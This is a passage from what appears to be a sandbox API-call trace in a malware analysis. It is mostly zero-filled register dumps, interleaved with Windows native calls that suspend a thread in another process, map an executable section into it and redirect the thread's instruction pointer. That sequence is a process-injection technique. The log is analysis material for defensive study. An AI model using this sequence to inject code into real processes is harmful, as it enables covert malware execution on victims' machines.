[51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0170.398] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0170.398] NtClose (Handle=0x138) returned 0x0 [0170.398] NtClose (Handle=0xb4) returned 0x0 [0170.405] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1010, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0170.405] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0170.405] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0170.405] NtReadVirtualMemory (in: ProcessHandle=0xb4, BaseAddress=0x3c6000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0170.405] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0170.412] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1014) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0170.412] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0170.412] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x21a0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0170.432] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3c6000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0170.435] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0170.435] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x17b200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x17c000) returned 0x0 [0170.447] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x17b200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x5e0000, SectionOffset=0x0, ViewSize=0xde6e8*=0x17c000) returned 0x0 [0170.505] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0170.525] NtClose (Handle=0x140) returned 0x0 [0170.526] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3c6000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x6c8707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, 